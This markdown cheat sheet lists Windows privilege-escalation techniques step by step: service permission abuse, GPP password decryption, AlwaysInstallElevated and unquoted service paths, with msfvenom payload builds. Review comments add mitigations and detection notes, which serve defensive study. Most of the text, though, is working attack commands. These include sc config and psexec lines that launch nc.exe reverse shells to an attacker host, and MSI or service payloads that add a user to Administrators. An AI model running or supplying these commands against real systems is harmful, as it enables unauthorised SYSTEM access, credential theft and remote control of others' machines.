4.2-Windows-Privilege-Escalation.md


Intrusion phase (Linux)

Privilege Escalation

Weak permissions

# Check for services with weak permissions (service objects that "Authenticated Users" can write to).
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Check the permissions of the service found above.
accesschk.exe -ucqv upnphost
# Upload nc.exe to a writable directory.
# NOTE(review): because non-admin users can change this service's configuration, both the
# binary path and the account the service runs as can be replaced. The mitigation is to
# restrict SERVICE_CHANGE_CONFIG on the service's DACL to administrators.
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# Check the status now.
sc qc upnphost
# Change the start option to AUTO-START.
# NOTE(review): SSDPSRV is started first, presumably because upnphost depends on it — confirm
# with `sc qc`. The Service Control Manager logs start-type changes in the System event log,
# so this step is one place a defender can detect the technique.
sc config SSDPSRV start=auto
# Start the services.
net start SSDPSRV
net stop upnphost
net start upnphost

Listen on port 9988 and you will get a shell with NT AUTHORITY\SYSTEM privileges.

Groups.xml

# Look up the IP address of the DC.
nslookup nameofserver.whatever.local
# It will output something like this:
Address:  192.168.1.101
# Now we mount it.
# NOTE(review): SYSVOL is readable by every domain user, which is why credentials stored in
# Group Policy Preference files there are exposed to any authenticated account.
net use z: \\192.168.1.101\SYSVOL
# And enter it.
z:
# Now we search for the Groups.xml file.
dir Groups.xml /s
# Decrypt the password in it.
# NOTE(review): the cpassword value in GPP XML is AES-encrypted with a key that Microsoft
# published, so it is effectively plaintext (MS14-025). Mitigation: remove credentials from
# existing GPP files in SYSVOL — the patch only prevents new ones from being created.
gpp-decrypt <pass>

AlwaysInstallElevated

# Query the AlwaysInstallElevated policy in both the machine and the user hive.
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# From the output, notice that "AlwaysInstallElevated" value is 1.
# NOTE(review): the policy only takes effect when the value is 1 in BOTH hives; it lets any
# user install MSI packages with SYSTEM privileges. Mitigation: leave it disabled (0) in both.

Exploit

# Build an MSI whose install action adds the account named 'user' to the local Administrators group.
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
# Place 'setup.msi' in 'C:\Temp'.
# Run the install quietly; with AlwaysInstallElevated set, Windows Installer runs it as SYSTEM.
# NOTE(review): Windows Installer records installs in the Application event log (MsiInstaller
# source), so an unexpected MSI install started by a standard user is a detection opportunity.
msiexec /quiet /qn /i C:\Temp\setup.msi
# Verify the group membership change.
net localgroup Administrators

Unquoted Path

# List auto-start services whose binary path is outside C:\Windows and is not already quoted
# (the last findstr filters out paths that contain a double quote).
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# NOTE(review): with an unquoted path containing spaces, the Service Control Manager tries each
# space-delimited prefix (e.g. "C:\Program.exe", "C:\Program Files (x86)\Program.exe") before
# the real binary, so a writable intermediate directory is the actual weakness. Mitigation:
# quote the service's ImagePath and keep those directories non-writable by standard users.
# Check the permissions of the folder path.
icacls "C:\Program Files (x86)\Program Folder" 

Exploit

# Build a service-format executable that adds the account named 'user' to local Administrators.
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
# Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
# Start the service so the SCM resolves the unquoted path to the planted binary.
# NOTE(review): a new executable appearing under Program Files and a service start triggered by
# a standard user are both detectable; the fix belongs in the service's ImagePath quoting and
# the directory ACLs, not in the service binary itself.
sc start unquotedsrvc
# Verify the group membership change.
net localgroup Administrators

Psexec

PsExec using found credentials

# Upload nc.exe to a writable directory.
# NOTE(review): PsExec runs the command on MACHINENAME as the supplied account and installs a
# temporary service (PSEXESVC) on the target, so a service-installation event there is the usual
# detection signal. The credentials are passed on the command line, so they also end up in
# process-creation logs on the source host.
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <ip> <port> -e C:\windows\system32\cmd.exe